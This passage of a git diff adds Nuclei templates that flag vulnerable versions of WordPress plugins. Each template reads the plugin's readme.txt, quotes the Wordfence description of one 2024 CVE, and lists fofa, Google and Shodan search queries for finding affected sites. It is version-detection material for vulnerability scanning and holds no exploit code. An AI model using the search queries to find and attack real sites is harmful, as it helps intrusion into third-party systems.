/dev/null +++ b/poc/cve/CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949 + +info: + name: > + TI WooCommerce Wishlist <= 2.8.2 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The TI WooCommerce Wishlist plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6c8456fa-939c-4ceb-8361-a8758aec7708?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43917 + metadata: + fofa-query: "wp-content/plugins/ti-woocommerce-wishlist/" + google-query: inurl:"/wp-content/plugins/ti-woocommerce-wishlist/" + shodan-query: 'vuln:CVE-2024-43917' + tags: cve,wordpress,wp-plugin,ti-woocommerce-wishlist,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ti-woocommerce-wishlist/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ti-woocommerce-wishlist" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97.yaml b/poc/cve/CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97.yaml new file mode 100644 index 0000000000..1ef14a845c --- /dev/null +++ b/poc/cve/CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97 + +info: + name: > + WBW Product Table Pro <= 1.9.4 - Unauthenticated Arbitrary SQL Execution + author: topscoder + severity: critical + description: > + The WBW Product Table Pro plugin for WordPress is vulnerable to unauthorized arbitrary SQL Execution due to a missing capability check on a function in all versions up to, and including, 1.9.4. This makes it possible for unauthenticated attackers to execute arbitrary SQL queries that can be used to steal sensitive data or gain elevated access to a vulnerable site. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac167257-c34e-45a2-8647-ed5cdb8dd64d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-43918 + metadata: + fofa-query: "wp-content/plugins/woo-producttables-pro/" + google-query: inurl:"/wp-content/plugins/woo-producttables-pro/" + shodan-query: 'vuln:CVE-2024-43918' + tags: cve,wordpress,wp-plugin,woo-producttables-pro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-producttables-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-producttables-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e.yaml b/poc/cve/CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e.yaml new file mode 100644 index 0000000000..befa2978d8 --- /dev/null +++ b/poc/cve/CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e + +info: + name: > + WP Testimonial Widget <= 3.1 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The WP Testimonial Widget plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/072b66dd-a5d3-46b5-92ec-9cc83b8ea8ef?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-43966 + metadata: + fofa-query: "wp-content/plugins/wp-testimonial-widget/" + google-query: inurl:"/wp-content/plugins/wp-testimonial-widget/" + shodan-query: 'vuln:CVE-2024-43966' + tags: cve,wordpress,wp-plugin,wp-testimonial-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-testimonial-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-testimonial-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml b/poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml new file mode 100644 index 0000000000..71c08b14c2 --- /dev/null +++ b/poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254 + +info: + name: > + WP Testimonial Widget <= 3.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Testimonial Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b11ccbbd-c909-4160-af36-8f0b50fb1285?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-43967 + metadata: + fofa-query: "wp-content/plugins/wp-testimonial-widget/" + google-query: inurl:"/wp-content/plugins/wp-testimonial-widget/" + shodan-query: 'vuln:CVE-2024-43967' + tags: cve,wordpress,wp-plugin,wp-testimonial-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-testimonial-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-testimonial-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5857-3d292977eef774943a0aa421905b95f9.yaml b/poc/cve/CVE-2024-5857-3d292977eef774943a0aa421905b95f9.yaml new file mode 100644 index 0000000000..8d0507662b --- /dev/null +++ b/poc/cve/CVE-2024-5857-3d292977eef774943a0aa421905b95f9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5857-3d292977eef774943a0aa421905b95f9 + +info: + name: > + Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free <= 3.7.3.2 - Missing Authorization to Unauthenticated Arbitrary Media Deletion + author: topscoder + severity: high + description: > + The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the af2_handel_file_remove AJAX action in all versions up to, and including, 3.7.3.2. This makes it possible for unauthenticated attackers to delete arbitrary media files. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cd0e015-abf2-4905-8b42-46b685be2c74?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L + cvss-score: 5.3 + cve-id: CVE-2024-5857 + metadata: + fofa-query: "wp-content/plugins/funnelforms-free/" + google-query: inurl:"/wp-content/plugins/funnelforms-free/" + shodan-query: 'vuln:CVE-2024-5857' + tags: cve,wordpress,wp-plugin,funnelforms-free,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "funnelforms-free" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.3.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml b/poc/cve/CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml new file mode 100644 index 0000000000..a8ffb03e3e --- /dev/null +++ b/poc/cve/CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530 + +info: + name: > + WP Accessibility Helper <= 0.6.2.8 - Missing Authorization to Authenticated (Subscriber+) Limited Settings Update + author: topscoder + severity: low + description: > + The WP Accessibility Helper (WAH) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_contrast_variations' and 'save_empty_contrast_variations' functions in all versions up to, and including, 0.6.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit or delete contrast settings. Please note these issues were patched in 0.6.2.8, though it broke functionality and the vendor has not responded to our follow-ups. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3beee75-0480-4504-a177-45f8cd32cf36?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-5987 + metadata: + fofa-query: "wp-content/plugins/wp-accessibility-helper/" + google-query: inurl:"/wp-content/plugins/wp-accessibility-helper/" + shodan-query: 'vuln:CVE-2024-5987' + tags: cve,wordpress,wp-plugin,wp-accessibility-helper,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-accessibility-helper/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-accessibility-helper" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.6.2.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6311.yaml b/poc/cve/CVE-2024-6311.yaml new file mode 100644 index 0000000000..bcbf12a4b9 --- /dev/null +++ b/poc/cve/CVE-2024-6311.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6311 + +info: + name: > + Funnelforms Free <= 3.7.3.2 - Authenticated (Administrator+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Funnelforms Free plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'af2_add_font' function in all versions up to, and including, 3.7.3.2. This makes it possible for authenticated attackers, with administrator-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbd42fc4-ab4a-4053-b765-18272eacd2bc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-6311 + metadata: + fofa-query: "wp-content/plugins/funnelforms-free/" + google-query: inurl:"/wp-content/plugins/funnelforms-free/" + shodan-query: 'vuln:CVE-2024-6311' + tags: cve,wordpress,wp-plugin,funnelforms-free,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "funnelforms-free" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.3.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6312.yaml b/poc/cve/CVE-2024-6312.yaml new file mode 100644 index 0000000000..c989b2847b --- /dev/null +++ b/poc/cve/CVE-2024-6312.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6312 + +info: + name: > + Funnelforms Free <= 3.7.3.2 - Authenticated (Administrator+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + The Funnelforms Free plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 3.7.3.2 via the 'af2DeleteFontFile' function. This is due to the plugin not properly validating a file or its path prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3e815531-f966-44a1-a037-8077a40c83b0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H + cvss-score: 6.5 + cve-id: CVE-2024-6312 + metadata: + fofa-query: "wp-content/plugins/funnelforms-free/" + google-query: inurl:"/wp-content/plugins/funnelforms-free/" + shodan-query: 'vuln:CVE-2024-6312' + tags: cve,wordpress,wp-plugin,funnelforms-free,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "funnelforms-free" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.3.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3.yaml b/poc/cve/CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3.yaml new file mode 100644 index 0000000000..a5e973a0c6 --- /dev/null +++ b/poc/cve/CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3 + +info: + name: > + GEO my WordPress <= 4.5.0.1 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + The GEO my WP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.5.0.1 via the 'form[info_window_template][content_path]' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1e65922a-3498-4946-8415-3d922e85e46a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-6330 + metadata: + fofa-query: "wp-content/plugins/geo-my-wp/" + google-query: inurl:"/wp-content/plugins/geo-my-wp/" + shodan-query: 'vuln:CVE-2024-6330' + tags: cve,wordpress,wp-plugin,geo-my-wp,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/geo-my-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "geo-my-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.5.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6448.yaml b/poc/cve/CVE-2024-6448.yaml new file mode 100644 index 0000000000..af07d0eadb --- /dev/null +++ b/poc/cve/CVE-2024-6448.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6448 + +info: + name: > + Mollie Payments for WooCommerce <= 7.7.0 - Unauthenticated Full Path Disclosure + author: topscoder + severity: medium + description: > + The Mollie Payments for WooCommerce plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 7.7.0. This is due to the error reporting being enabled by default in multiple plugin files. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c98026c-28a9-4c69-9f34-4c3bd4f75d85?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6448 + metadata: + fofa-query: "wp-content/plugins/mollie-payments-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/mollie-payments-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-6448' + tags: cve,wordpress,wp-plugin,mollie-payments-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mollie-payments-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mollie-payments-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.7.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f.yaml b/poc/cve/CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f.yaml new file mode 100644 index 0000000000..8ea5d1b1b9 --- /dev/null +++ b/poc/cve/CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f + +info: + name: > + AI Engine <= 2.5.0 - Authenticated (Admin+) Remote Code Execution + author: topscoder + severity: low + description: > + The AI Engine plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.5.0 via the /wp-json/mwai/v1/settings/update REST API endpoint. This is due to the plugin not properly validating a log path file extension allowing a user to set the log extension as .php making the file executable. This makes it possible for authenticated attackers, with administrator-level access and above, to execute code on the server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9f6b761-9c4b-4dcc-885d-9a5b4e8e534d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-6451 + metadata: + fofa-query: "wp-content/plugins/ai-engine/" + google-query: inurl:"/wp-content/plugins/ai-engine/" + shodan-query: 'vuln:CVE-2024-6451' + tags: cve,wordpress,wp-plugin,ai-engine,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ai-engine/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ai-engine" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def.yaml b/poc/cve/CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def.yaml new file mode 100644 index 0000000000..9338ad547f --- /dev/null +++ b/poc/cve/CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def + +info: + name: > + GiveWP <= 3.15.1 - Unauthenticated Full Path Disclosure + author: topscoder + severity: medium + description: > + The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.15.1. This is due to the plugin utilizing Symfony and leaving display_errors on within test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a13ce09-b312-4186-b0e2-63065c47f15d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6551 + metadata: + fofa-query: "wp-content/plugins/give/" + google-query: inurl:"/wp-content/plugins/give/" + shodan-query: 'vuln:CVE-2024-6551' + tags: cve,wordpress,wp-plugin,give,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/give/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "give" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.15.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml b/poc/cve/CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml new file mode 100644 index 0000000000..0251751884 --- /dev/null +++ b/poc/cve/CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49 + +info: + name: > + Ditty 3.1.39 - 3.1.45 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Ditty – Responsive News Tickers, Sliders, and Lists plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Content Title' field in versions 3.1.39 to 3.1.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This was previously patched as CVE-2024-3939 and was recently reintroduced. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80f32108-16a5-478f-9966-7153735cad6d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6715 + metadata: + fofa-query: "wp-content/plugins/ditty-news-ticker/" + google-query: inurl:"/wp-content/plugins/ditty-news-ticker/" + shodan-query: 'vuln:CVE-2024-6715' + tags: cve,wordpress,wp-plugin,ditty-news-ticker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ditty-news-ticker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ditty-news-ticker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 3.1.39', '<= 3.1.45') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6879-408050f5fa9936779918006e4415cd11.yaml b/poc/cve/CVE-2024-6879-408050f5fa9936779918006e4415cd11.yaml new file mode 100644 index 0000000000..42125299f6 --- /dev/null +++ b/poc/cve/CVE-2024-6879-408050f5fa9936779918006e4415cd11.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6879-408050f5fa9936779918006e4415cd11 + +info: + name: > + Quiz and Survey Master (QSM) <= 9.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the redirect URL in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a87f0a2-42b0-4536-b4d1-83a9f6ed4262?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6879 + metadata: + fofa-query: "wp-content/plugins/quiz-master-next/" + google-query: inurl:"/wp-content/plugins/quiz-master-next/" + shodan-query: 'vuln:CVE-2024-6879' + tags: cve,wordpress,wp-plugin,quiz-master-next,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/quiz-master-next/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "quiz-master-next" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee.yaml b/poc/cve/CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee.yaml new file mode 100644 index 0000000000..6b0d972e1f --- /dev/null +++ b/poc/cve/CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization to Authenticated (Subscriber+) Plugin Data Update + author: topscoder + severity: low + description: > + The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update product and category descriptions, category titles and images, and sort order. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8664fec3-4e11-4775-a5ca-b4f58931da76?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7030 + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:CVE-2024-7030' + tags: cve,wordpress,wp-plugin,clover-online-orders,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml b/poc/cve/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml new file mode 100644 index 0000000000..edcefcecb4 --- /dev/null +++ b/poc/cve/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7032-cabe7edb9453e46b358c075428df2586 + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization to Plugin Deactivation and Data Deletion + author: topscoder + severity: high + description: > + The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'moo_deactivateAndClean' function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to deactivate the plugin and drop all plugin tables from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - 